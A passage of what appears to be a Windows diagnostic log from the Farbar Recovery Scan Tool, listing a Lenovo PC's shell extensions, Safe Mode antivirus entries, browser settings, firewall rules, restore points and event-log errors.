{CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com) HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com) ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Excel.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) -> --profile-directory=Default --app-id=leffmjdabcgaflkikcefahmlgpodjkdm --app-url=hxxps://excel.office.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Outlook.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) -> --profile-directory=Default --app-id=bjhmmnoficofgoiacjaajpkfndojknpb --app-url=hxxps://outlook.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Word.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) -> --profile-directory=Default --app-id=hikhggiobiflkdfdgdajcfklmcibbopi --app-url=hxxps://word.office.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt (anaconda3).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> "/K" C:\Users\FRANCIS\anaconda3\Scripts\activate.bat C:\Users\FRANCIS\anaconda3 ==================== Loaded Modules (Whitelisted) ============= 2021-03-08 12:25 - 2021-03-08 12:25 - 000365056 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\92d73c1b4f373c56f37354527cf8180a\Interop.CxHDAudioAPILib.ni.dll 2021-03-08 12:25 - 2021-03-08 12:25 - 000018944 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\b532a24672ce5738c417f60f93ec4be1\Interop.CxUtilSvcLib.ni.dll 2020-10-01 12:14 - 2010-12-08 15:21 - 000753664 _____ (BCGSoft Co Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGPStyle2010Blue150.dll 2020-10-01 12:14 - 2015-01-31 10:08 - 006062080 _____ (BCGSoft Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGCBPRO1500u80.dll 2020-09-28 20:17 - 2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [File not signed] [File is in use] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll 2020-10-01 12:14 - 2015-01-31 10:08 - 001093120 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\USB Disk Security\MFC80U.DLL 2020-10-01 16:40 - 2020-10-01 16:40 - 000057344 _____ (Microsoft Corporation) [File not signed] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.762_none_43efccf17831d131\MFC80ENU.DLL 2021-04-08 15:10 - 2021-04-08 15:10 - 000000000 ____L (Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\AppVIsvSubsystems64.dll 2021-04-08 15:10 - 2021-04-08 15:10 - 000000000 ____L (Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\c2r64.dll 2020-12-22 09:08 - 2020-05-30 14:58 - 001280000 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\x86\SQLite.Interop.dll ==================== Alternate Data Streams (Whitelisted) ======== (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:7C9E34A2 [260] ==================== Safe Mode (Whitelisted) ================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service" ==================== Association (Whitelisted) ================= ==================== Internet Explorer (Whitelisted) ========== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC) DPF: HKLM-x32 {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/stg_drm.ocx DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455} DPF: HKLM-x32 {CC450D71-CC90-424C-8638-1F2DBAC87A54} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/armhelper.ocx Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\sharepoint.com -> hxxps://mymailmapuaedu-files.sharepoint.com ==================== Other Areas =========================== (Currently there is no automatic fix for this section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Python39\Scripts\;C:\Python39\;C:\Program Files (x86)\Common Files\Intel\Shared Libraries\redist\intel64\compiler;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\MATLAB\R2019b\bin;C:\ProgramData\chocolatey\bin;C:\Program Files (x86)\FontForgeBuilds\bin;C:\Program Files\nodejs\ HKCU\Environment\\Path -> ;C:\Users\FRANCIS\AppData\Local\Programs\Microsoft VS Code\bin;C:\Users\FRANCIS\AppData\Roaming\npm HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg DNS Servers: 192.168.15.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (If an entry is included in the fixlist, it will be removed.) HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "GenuineService.lnk" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "BitTorrent" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "Lync" HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\StartupApproved\Run: => "com.squirrel.Teams.Teams" ==================== FirewallRules (Whitelisted) ================ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [UDP Query User{33CC5D8F-A04C-4287-98A2-248BF85E83CA}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [TCP Query User{2FDCF539-A9A5-418E-915D-A9F6DE9DB683}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [UDP Query User{E9A63349-3DAD-43E9-A0C2-4B2F8C93E608}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [TCP Query User{B5DCAAF9-24E1-46F6-99C1-35F496281A4A}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [{07BBFCF6-DF65-47F5-85C2-7D1B7C24B1A3}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{2888FD9A-0240-4993-8574-4D6FE92763C9}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{0456832C-81E2-4CB4-A595-ADAA5BE13C5A}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{C756A12D-A4ED-4DE2-BABB-B63C963899F5}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{55C341D3-D845-4467-B7D4-A1A3C9365514}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{92E821F5-0067-4BE8-87DC-FF54D1DDAF46}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{AA11FF77-EA4F-41ED-8B5D-3EE615A05069}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{E5F8868D-3083-4DA4-9765-2120F6BF9795}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{0BA8BD44-83D9-40E6-A999-E4D37858CBB0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => No File FirewallRules: [{717921BB-9091-4EED-A4CD-7505A7ED940F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => No File FirewallRules: [TCP Query User{C2385DA0-E699-4532-9801-1101007A4A24}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed] FirewallRules: [UDP Query User{9BE27131-2F41-4793-B132-6CA531C80BFA}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed] FirewallRules: [TCP Query User{7E8B4214-F799-4C32-B0FA-0C501D6B769F}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [UDP Query User{620EE8CA-B37A-4A2B-960E-839973E37DCA}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{1B5FFB87-BD24-4AAB-8232-877F7C32E185}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{6EB62FA3-39D4-4B05-A11B-582C247C8AFE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{D46C3A74-A2FD-4549-8A91-5A292FD373D7}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{1A279772-FE45-4B7F-98BC-83D4DC4D3B1F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{65533106-6D9B-4ED1-A603-23424A01100A}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{2E7F0967-8379-4D15-A8F7-A0C70358B61D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [TCP Query User{62309B5E-7E93-452D-85D7-5ECA8B8D2138}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{C53D51E0-69B0-447A-9628-66CDE2C11DD7}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{1DC8F033-ACD2-43D0-810E-40C8034169CB}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{0E7FB93C-3FCF-492C-8942-5F9902E6AF3D}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{49F5DBB5-AFEA-4EA5-925F-7B913B073C46}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed] FirewallRules: [{A7C37344-5433-47B3-9391-0549424B09C3}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed] FirewallRules: [{F97B6736-0B66-4DD1-9300-900E438ADC1D}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> ) FirewallRules: [{1595DAE1-94A1-4BEE-8C9A-8A2A87AD69FA}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> ) FirewallRules: [{B1443A2D-C10F-4D7B-B0E5-D23CE1F9FCD3}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRW.exe => No File FirewallRules: [{CE7DA8F3-C864-4218-8034-F5E810694A18}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRWUI.exe => No File FirewallRules: [{E525347A-A948-4513-9338-37E34903389E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{53DA5FCB-03B1-47B3-8F3F-1C013CF5B3FB}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{CD74709F-9987-4A09-A025-6E452B134692}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{72085FAE-6A37-4774-ABCF-028B74723DC4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{B1A406EC-89D8-405E-8973-45A8BD00BCC0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{A96D2325-0844-4943-9D87-D23DAC9F6AC7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{4171C853-6EDB-4B71-B2DF-FFF66E8374C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{88742A13-B4E2-4613-8E55-3C211095B389}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{91FB82E9-2BB5-4174-92D6-2C4CE2C0DE26}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{09A668FD-A7A6-4801-AB23-266C7E561E6F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{9A9D7F93-D218-463D-9E4C-9702C0D2FE41}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{CDB1353C-D9B2-4804-9C27-DC3587BFF5CE}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) ==================== Restore Points ========================= 05-05-2021 11:36:48 Scheduled Checkpoint 06-05-2021 09:53:15 Windows Modules Installer 06-05-2021 10:20:21 Windows Modules Installer 07-05-2021 09:21:27 Removed Adobe Acrobat DC. ==================== Faulty Device Manager Devices ============ ==================== Event log errors: ======================== Application errors: ================== Error: (05/07/2021 09:27:34 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: ADelRCP.exe, version: 21.1.20150.39313, time stamp: 0x607f6ae1 Faulting module name: ucrtbase.dll, version: 10.0.19041.789, time stamp: 0x82dc99a2 Exception code: 0xc0000409 Fault offset: 0x0009d132 Faulting process id: 0x23a0 Faulting application start time: 0x01d742e025baf1c1 Faulting application path: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Faulting module path: C:\WINDOWS\System32\ucrtbase.dll Report Id: 12b05567-9e1c-495a-8014-344c92c4e202 Faulting package full name: Faulting package-relative application ID: Error: (05/06/2021 02:59:50 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Microsoft.Photos.exe version 2020.20120.4004.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 1784 Start Time: 01d7424531db65b3 Termination Time: 4294967295 Application Path: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe Report Id: 6fa2ff16-ef10-4395-8bcc-aab6ec1bd2fb Faulting package full name: Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe Faulting package-relative application ID: App Hang type: Activation Error: (05/04/2021 08:47:57 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW. hr = 0x80070006, The handle is invalid. . Operation: Executing Asynchronous Operation Context: Current State: DoSnapshotSet Error: (05/04/2021 06:10:10 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Launch.exe version 18.11.154.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 1194 Start Time: 01d740ccf4ff8045 Termination Time: 4294967295 Application Path: C:\Program Files\McAfee\CoreUI\Launch.exe Report Id: 35ebc678-069c-40ac-b971-731f75b6a443 Faulting package full name: Faulting package-relative application ID: Hang type: Top level window is idle Error: (05/04/2021 03:15:28 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program LockApp.exe version 10.0.19041.844 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 3194 Start Time: 01d740b4590f7113 Termination Time: 4294967295 Application Path: C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe Report Id: 4be4fb5e-765c-4158-bed0-36c963af4ca4 Faulting package full name: Microsoft.LockApp_10.0.19041.423_neutral__cw5n1h2txyewy Faulting package-relative application ID: WindowsDefaultLockScreen Hang type: Quiesce Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000003fc,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,000000A037CFED20.72). hr = 0x80070005, Access is denied. . Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000288,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,000000A0380FF280.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f} Writer Name: COM+ REGDB Writer Writer Instance ID: {e7e2a211-c1b2-447a-86e8-0f1a13d9d43d} Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000280,(null),0,REG_BINARY,0000002CF238D800.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0} Writer Name: WMI Writer Writer Instance ID: {8d07eb09-1827-4d85-ab69-35736fff7086} System errors: ============= Error: (05/07/2021 10:57:23 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Update Orchestrator Service service hung on starting. Error: (05/07/2021 10:53:44 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Downloaded Maps Manager service hung on starting. Error: (05/07/2021 10:51:31 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Delivery Optimization service hung on starting. Error: (05/07/2021 10:49:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion. Error: (05/07/2021 10:49:17 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Presentation Foundation Font Cache 3.0.0.0 service to connect. Error: (05/07/2021 10:48:38 AM) (Source: Service Control Manager) (EventID: 7016) (User: ) Description: The Conexant SmartAudio service service has reported an invalid current state 14. Error: (05/07/2021 10:46:08 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY) Description: There was an error while attempting to read the local hosts file. Error: (05/07/2021 10:45:33 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (45000 milliseconds) while waiting for the Dolby DAX2 API Service service to connect. Windows Defender: ================ Date: 2021-04-28 09:47:58 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2021-04-25 11:06:26 Description: Microsoft Defender 